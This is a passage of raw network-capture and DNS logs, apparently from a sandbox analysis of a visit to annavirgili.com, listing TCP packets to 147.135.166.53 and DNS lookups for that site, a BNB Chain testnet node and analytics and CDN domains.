                                                                                                          Dec 12, 2024 12:58:22.907555103 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.907578945 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.907614946 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.907624006 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.907655954 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.907665014 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.930341005 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.930402040 CET44349851147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.965351105 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.965411901 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.965447903 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.965460062 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:22.965476036 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.965492010 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:22.978235960 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.039149046 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.039201975 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.039248943 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.039262056 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.039278030 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.039298058 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.055912018 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.055958986 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.056030989 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.056031942 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.056066036 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.056118011 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.072424889 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.072469950 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.072515011 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.072525024 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.072575092 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.085702896 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.085748911 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.085777044 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.085796118 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.085817099 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.085836887 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.099088907 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.099142075 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.099184990 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.099195004 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.099231958 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.099456072 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.111239910 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.111262083 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.111325026 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.111334085 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.111380100 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.111380100 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.166364908 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.166420937 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.166505098 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.166564941 CET49848443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.167748928 CET49848443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.167772055 CET44349848147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.219043970 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.219067097 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.219182968 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.219232082 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.221155882 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.227519035 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.227526903 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.227605104 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.227621078 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.227652073 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.227674007 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.236162901 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.236196041 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.236251116 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.236265898 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.236291885 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.236309052 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.244653940 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.244677067 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.244744062 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.244759083 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.244782925 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.244801998 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.250590086 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.250653982 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.250670910 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.250684023 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.250710011 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.250719070 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.253866911 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.322290897 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.322470903 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.322567940 CET49847443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.366939068 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.389955997 CET44349851147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.403390884 CET49852443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.403450012 CET44349852147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.403527975 CET49852443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.404690981 CET49853443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.404735088 CET44349853147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.404814005 CET49853443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.407135963 CET49853443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.407181025 CET44349853147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.408723116 CET49852443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.408739090 CET44349852147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.425331116 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.428221941 CET49847443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.428286076 CET44349847147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.429315090 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.432320118 CET49851443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.436731100 CET49855443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.436752081 CET44349855147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.436885118 CET49855443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.437244892 CET49846443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.437263012 CET44349846147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.440599918 CET49856443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.440609932 CET44349856147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.440661907 CET49856443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.448051929 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.448086977 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.448123932 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.448146105 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.448188066 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.448194027 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.448206902 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.448214054 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.448236942 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.448246956 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.448259115 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.448263884 CET44349849147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.448302984 CET49849443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.449259996 CET49856443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.449278116 CET44349856147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.449587107 CET49855443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.449604034 CET44349855147.135.166.53192.168.2.24
                                                                                                          Dec 12, 2024 12:58:23.500627041 CET49857443192.168.2.24147.135.166.53
                                                                                                          Dec 12, 2024 12:58:23.500670910 CET44349857147.135.166.53192.168.2.24
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 12, 2024 12:57:46.383945942 CET192.168.2.241.1.1.10xb693Standard query (0)srtb.msn.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:55.137943029 CET192.168.2.241.1.1.10x1c65Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:55.138098955 CET192.168.2.241.1.1.10xc3e4Standard query (0)www.google.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:56.463555098 CET192.168.2.241.1.1.10xc9b0Standard query (0)annavirgili.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:56.464219093 CET192.168.2.241.1.1.10xe40bStandard query (0)annavirgili.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:56.472671986 CET192.168.2.241.1.1.10x5ccbStandard query (0)annavirgili.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:56.472811937 CET192.168.2.241.1.1.10xd866Standard query (0)annavirgili.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:15.045216084 CET192.168.2.241.1.1.10xfae1Standard query (0)annavirgili.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:15.045216084 CET192.168.2.241.1.1.10xd63dStandard query (0)annavirgili.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:15.357054949 CET192.168.2.241.1.1.10x9482Standard query (0)data-seed-prebsc-1-s1.bnbchain.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:15.357054949 CET192.168.2.241.1.1.10xfcaStandard query (0)_8545._https.data-seed-prebsc-1-s1.bnbchain.org65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.011970997 CET192.168.2.241.1.1.10x277eStandard query (0)data-seed-prebsc-1-s1.bnbchain.orgA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.012124062 CET192.168.2.241.1.1.10x7e05Standard query (0)_8545._https.data-seed-prebsc-1-s1.bnbchain.org65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.018914938 CET192.168.2.241.1.1.10xaecaStandard query (0)use.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.019160032 CET192.168.2.241.1.1.10xe9d5Standard query (0)use.fontawesome.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:24.042360067 CET192.168.2.241.1.1.10x38b0Standard query (0)static.hotjar.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:24.042602062 CET192.168.2.241.1.1.10x3847Standard query (0)static.hotjar.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:28.548974037 CET192.168.2.241.1.1.10x8af3Standard query (0)static.hotjar.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:28.549297094 CET192.168.2.241.1.1.10xa36eStandard query (0)static.hotjar.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:30.597009897 CET192.168.2.241.1.1.10x5be9Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:30.597197056 CET192.168.2.241.1.1.10xd1daStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.314224005 CET192.168.2.241.1.1.10x737bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.314553976 CET192.168.2.241.1.1.10x58bdStandard query (0)www.google.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.766696930 CET192.168.2.241.1.1.10xa3e2Standard query (0)mc.yandex.ruA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.766985893 CET192.168.2.241.1.1.10x9377Standard query (0)mc.yandex.ru65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:34.007345915 CET192.168.2.241.1.1.10x611fStandard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:34.007481098 CET192.168.2.241.1.1.10x6976Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:36.305659056 CET192.168.2.241.1.1.10xa547Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:36.305798054 CET192.168.2.241.1.1.10xd0a7Standard query (0)www.google.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.387975931 CET192.168.2.241.1.1.10x18ccStandard query (0)mc.yandex.ruA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.388246059 CET192.168.2.241.1.1.10xed76Standard query (0)mc.yandex.ru65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.755971909 CET192.168.2.241.1.1.10x175dStandard query (0)mc.yandex.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.756524086 CET192.168.2.241.1.1.10xf589Standard query (0)mc.yandex.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:38.802649021 CET192.168.2.241.1.1.10xcf01Standard query (0)mc.yandex.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:38.803035021 CET192.168.2.241.1.1.10xde3cStandard query (0)mc.yandex.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.523499012 CET192.168.2.241.1.1.10xb762Standard query (0)script.hotjar.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.523731947 CET192.168.2.241.1.1.10x8473Standard query (0)script.hotjar.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.753365993 CET192.168.2.241.1.1.10x7890Standard query (0)mc.yandex.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:43.753515959 CET192.168.2.241.1.1.10x3f1dStandard query (0)mc.yandex.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:48.610749960 CET192.168.2.241.1.1.10xb906Standard query (0)script.hotjar.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:48.610893965 CET192.168.2.241.1.1.10x2f61Standard query (0)script.hotjar.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:50.924475908 CET192.168.2.241.1.1.10xe6dStandard query (0)ws.hotjar.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:50.924926996 CET192.168.2.241.1.1.10xe23aStandard query (0)ws.hotjar.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.016288042 CET192.168.2.241.1.1.10xa2eaStandard query (0)content.hotjar.ioA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.016566038 CET192.168.2.241.1.1.10x9d32Standard query (0)content.hotjar.io65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.341494083 CET192.168.2.241.1.1.10x6b97Standard query (0)vc.hotjar.ioA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:51.341666937 CET192.168.2.241.1.1.10xd607Standard query (0)vc.hotjar.io65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:54.699033022 CET192.168.2.241.1.1.10x4fd9Standard query (0)content.hotjar.ioA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:54.699230909 CET192.168.2.241.1.1.10x8927Standard query (0)content.hotjar.io65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:56.544706106 CET192.168.2.241.1.1.10x16e1Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:56.544842005 CET192.168.2.241.1.1.10xd397Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:59.039982080 CET192.168.2.241.1.1.10xc075Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:59.040395021 CET192.168.2.241.1.1.10xf33fStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                          2024-12-12 11:57:46 UTC192.168.2.24172.64.41.30x0Standard query (0)srtb.msn.comA (IP address)IN (0x0001)true
                                                                                                          2024-12-12 11:57:52 UTC192.168.2.24172.64.41.30x0Standard query (0)cxcs.microsoft.netA (IP address)IN (0x0001)true
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 12, 2024 12:57:46.521994114 CET1.1.1.1192.168.2.240xb693No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:46.521994114 CET1.1.1.1192.168.2.240xb693No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:55.275378942 CET1.1.1.1192.168.2.240x1c65No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:55.275576115 CET1.1.1.1192.168.2.240xc3e4No error (0)www.google.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:57.101423979 CET1.1.1.1192.168.2.240xc9b0No error (0)annavirgili.com147.135.166.53A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:57:57.101819038 CET1.1.1.1192.168.2.240x5ccbNo error (0)annavirgili.com147.135.166.53A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:15.184647083 CET1.1.1.1192.168.2.240xfae1No error (0)annavirgili.com147.135.166.53A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:15.753952980 CET1.1.1.1192.168.2.240x9482No error (0)data-seed-prebsc-1-s1.bnbchain.orga37dd8b3f3000a75e.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:15.753952980 CET1.1.1.1192.168.2.240x9482No error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com15.197.152.159A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:15.753952980 CET1.1.1.1192.168.2.240x9482No error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com3.33.155.121A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:15.804415941 CET1.1.1.1192.168.2.240xfcaName error (3)_8545._https.data-seed-prebsc-1-s1.bnbchain.orgnonenone65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.149128914 CET1.1.1.1192.168.2.240x277eNo error (0)data-seed-prebsc-1-s1.bnbchain.orga37dd8b3f3000a75e.awsglobalaccelerator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.149128914 CET1.1.1.1192.168.2.240x277eNo error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com15.197.152.159A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.149128914 CET1.1.1.1192.168.2.240x277eNo error (0)a37dd8b3f3000a75e.awsglobalaccelerator.com3.33.155.121A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.152585030 CET1.1.1.1192.168.2.240x7e05Name error (3)_8545._https.data-seed-prebsc-1-s1.bnbchain.orgnonenone65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.156311035 CET1.1.1.1192.168.2.240xaecaNo error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:18.156940937 CET1.1.1.1192.168.2.240xe9d5No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:24.180167913 CET1.1.1.1192.168.2.240x3847No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:24.182594061 CET1.1.1.1192.168.2.240x38b0No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:24.182594061 CET1.1.1.1192.168.2.240x38b0No error (0)static-cdn.hotjar.com108.158.75.113A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:24.182594061 CET1.1.1.1192.168.2.240x38b0No error (0)static-cdn.hotjar.com108.158.75.120A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:24.182594061 CET1.1.1.1192.168.2.240x38b0No error (0)static-cdn.hotjar.com108.158.75.87A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:24.182594061 CET1.1.1.1192.168.2.240x38b0No error (0)static-cdn.hotjar.com108.158.75.112A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:28.686616898 CET1.1.1.1192.168.2.240x8af3No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:28.686616898 CET1.1.1.1192.168.2.240x8af3No error (0)static-cdn.hotjar.com108.158.75.87A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:28.686616898 CET1.1.1.1192.168.2.240x8af3No error (0)static-cdn.hotjar.com108.158.75.112A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:28.686616898 CET1.1.1.1192.168.2.240x8af3No error (0)static-cdn.hotjar.com108.158.75.113A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:28.686616898 CET1.1.1.1192.168.2.240x8af3No error (0)static-cdn.hotjar.com108.158.75.120A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:28.687119961 CET1.1.1.1192.168.2.240xa36eNo error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:30.734175920 CET1.1.1.1192.168.2.240x5be9No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:30.734175920 CET1.1.1.1192.168.2.240x5be9No error (0)scontent.xx.fbcdn.net157.240.196.15A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:30.734231949 CET1.1.1.1192.168.2.240xd1daNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:30.734231949 CET1.1.1.1192.168.2.240xd1daNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:30.734231949 CET1.1.1.1192.168.2.240xd1daNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.451309919 CET1.1.1.1192.168.2.240x737bNo error (0)www.google.com172.217.19.164A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.452536106 CET1.1.1.1192.168.2.240x58bdNo error (0)www.google.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.903897047 CET1.1.1.1192.168.2.240xa3e2No error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.903897047 CET1.1.1.1192.168.2.240xa3e2No error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.903897047 CET1.1.1.1192.168.2.240xa3e2No error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:33.903897047 CET1.1.1.1192.168.2.240xa3e2No error (0)mc.yandex.ru87.250.250.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:34.144391060 CET1.1.1.1192.168.2.240x6976No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:34.144391060 CET1.1.1.1192.168.2.240x6976No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:34.144391060 CET1.1.1.1192.168.2.240x6976No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:34.144495010 CET1.1.1.1192.168.2.240x611fNo error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:34.144495010 CET1.1.1.1192.168.2.240x611fNo error (0)scontent.xx.fbcdn.net157.240.196.15A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:36.442811012 CET1.1.1.1192.168.2.240xd0a7No error (0)www.google.com65IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:36.446490049 CET1.1.1.1192.168.2.240xa547No error (0)www.google.com142.250.181.100A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.524857044 CET1.1.1.1192.168.2.240x18ccNo error (0)mc.yandex.ru87.250.251.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.524857044 CET1.1.1.1192.168.2.240x18ccNo error (0)mc.yandex.ru77.88.21.119A (IP address)IN (0x0001)false
                                                                                                          Dec 12, 2024 12:58:37.524857044 CET1.1.1.1192.168.2.240x18ccNo error (0)mc.yandex.ru93.158.134.119A (IP address)IN (0x0001)false
